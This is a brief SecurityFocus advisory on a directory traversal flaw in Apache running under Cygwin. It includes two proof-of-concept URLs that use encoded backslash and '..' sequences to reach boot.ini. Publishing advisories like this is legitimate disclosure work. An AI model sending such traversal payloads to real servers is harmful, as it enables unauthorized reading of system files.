Apache Cygwin Directory Traversal Vulnerability

No exploit is required.

The following proof of concept has been supplied:
http://www.example.com/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini


 

Privacy Statement
Copyright 2010, SecurityFocus